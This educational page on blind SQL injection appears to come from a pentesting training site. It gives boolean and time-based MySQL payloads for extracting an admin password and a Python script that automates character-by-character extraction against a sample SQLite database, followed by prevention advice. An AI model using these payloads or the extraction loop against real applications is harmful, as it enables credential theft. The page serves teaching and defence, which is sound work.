Blind SQL Injection

Blind SQL Injection occurs when an application is vulnerable to SQL injection but the results of the injected query are not returned in the response, and usually no database error message is shown either. Attackers must infer information by asking the database true/false questions and observing a side channel: a difference in the page content, or a difference in how long the response takes.

How It Works

Since the attacker cannot see query results directly, they inject conditions that cause an observable difference in application behavior depending on whether the condition is true or false. Each request answers one yes/no question, so data is extracted one bit or one character at a time. This makes blind injection slower and noisier than a classic injection, but no less complete: anything the database account can read can eventually be pulled out.

Types of Blind SQLi

  • Boolean-based: the injected condition changes the content of the response (a row is shown or not)
  • Time-based: the condition controls a deliberate delay (SLEEP, WAITFOR DELAY, pg_sleep) and the attacker times the response
  • Error-based: the condition decides whether a database error is triggered (for example a division by zero), and the attacker observes whether the error page appears

Example

Boolean-based blind SQLi to extract the admin password (MySQL syntax; the query is assumed to read from the users table, and in a real request the spaces and quotes would be URL-encoded):

// Check if first character of password is 'a'
GET /user?id=1 AND SUBSTRING(password,1,1)='a'

// If true: normal response (200 OK, user shown)
// If false: different response (empty page, error page, or a different content length)

// Iterate through positions and candidate characters to extract the full password.
// MySQL's default collations compare case-insensitively, so 'a' also matches 'A';
// compare ASCII(SUBSTRING(password,1,1))=97 or use BINARY to distinguish case.

Time-based blind SQLi, used when true and false produce the same page:

// If first char is 'a', delay 5 seconds
GET /user?id=1 AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0)

// Measure response time to determine whether the condition is true.
// Pick a delay well above normal network jitter and repeat borderline measurements;
// the equivalent on MSSQL is WAITFOR DELAY '0:0:5', on PostgreSQL pg_sleep(5).
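The character-by-character extraction loop the example describes, as an added example that is not part of the original page. It uses a constructed in-memory SQLite stand-in for the vulnerable /user?id= endpoint (the users table, its rows, and the vulnerable_lookup and safe_lookup functions are assumptions made for the demonstration, not PentesterLab code), an oracle that returns only the single bit the attacker can observe, and an extractor that binary-searches each character's code point instead of trying every candidate, which is what keeps request counts manageable in practice. The same loop also runs against the parameterized version of the lookup, where it recovers nothing.

```python
import sqlite3
from typing import Callable

# A "lookup" models one request to /user?id=<value>: it returns True when the
# page would show a user and False for an empty page or an error page.
Lookup = Callable[[sqlite3.Connection, str], bool]


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's database (sample data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "Tr0ub4dor"), (2, "bob", "hunter2")])
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> bool:
    """Hypothetical vulnerable handler: the id is concatenated into the query.

    Query results never reach the caller; only 'row or no row' does, and an
    error is indistinguishable from no row. That bit is the blind channel.
    """
    sql = f"SELECT username FROM users WHERE id={user_id}"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> bool:
    """Hypothetical fixed handler: the id is validated and bound as a parameter."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    return conn.execute("SELECT username FROM users WHERE id=?", (uid,)).fetchone() is not None


def ask(lookup: Lookup, conn: sqlite3.Connection, condition: str) -> bool:
    """Ask the database one yes/no question through the injection point."""
    return lookup(conn, f"1 AND ({condition})")


def binary_search(lookup: Lookup, conn: sqlite3.Connection, expr: str, lo: int, hi: int) -> int:
    """Recover the integer value of SQL expression `expr`, known to lie in [lo, hi).

    Each question 'expr >= mid' halves the range, so a printable ASCII character
    costs about 7 requests instead of up to 95 linear guesses. If expr is NULL
    (no such user, position past the end) every answer is False and lo is returned.
    """
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ask(lookup, conn, f"({expr}) >= {mid}"):
            lo = mid
        else:
            hi = mid
    return lo


def extract_password(lookup: Lookup, conn: sqlite3.Connection,
                     username: str = "admin", max_len: int = 64) -> str:
    """Extract a user's password through the blind oracle, length first, then
    one character per position. SUBSTR/UNICODE are SQLite's spellings of the
    SUBSTRING/ASCII functions used in the MySQL payloads above."""
    target = f"SELECT password FROM users WHERE username='{username}'"
    length = binary_search(lookup, conn, f"LENGTH(({target}))", 0, max_len + 1)
    chars = []
    for pos in range(1, length + 1):
        # Assumes printable ASCII (32..126); other code points clamp to the range edges.
        code = binary_search(lookup, conn, f"UNICODE(SUBSTR(({target}), {pos}, 1))", 32, 127)
        chars.append(chr(code))
    return "".join(chars)


class CountingLookup:
    """Wraps a lookup and counts requests, to show what extraction costs."""

    def __init__(self, lookup: Lookup):
        self.lookup = lookup
        self.requests = 0

    def __call__(self, conn: sqlite3.Connection, user_id: str) -> bool:
        self.requests += 1
        return self.lookup(conn, user_id)


if __name__ == "__main__":
    conn = build_db()
    counting = CountingLookup(vulnerable_lookup)
    pw = extract_password(counting, conn, "admin")
    print(f"vulnerable app: extracted {pw!r} in {counting.requests} requests")
    print(f"patched app:    extracted {extract_password(safe_lookup, conn, 'admin')!r}")
```

To turn this into the time-based variant, only the lookup changes: it wraps the condition in a conditional delay, times the request, and returns elapsed-time-above-threshold instead of row-or-no-row; the search loop stays the same. The request counter is also a useful defender's view: a burst of a few dozen near-identical requests to one endpoint, differing only in an id parameter that contains SQL keywords, is the signature this attack leaves in access logs.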

Prevention

  • Use parameterized queries (prepared statements) for every value that reaches a query; the bug is string concatenation, whether or not results are displayed
  • Apply the same protections as for regular SQL injection: allowlist identifiers such as table and column names that cannot be bound as parameters, and run the application with a least-privilege database account
  • Implement rate limiting and alert on bursts of near-identical requests; this slows extraction but does not remove the injection
  • Use consistent error handling so that errors and empty results look the same from outside; this closes the error-based channel only, not the boolean or timing ones

PentesterLab Exercises

See Also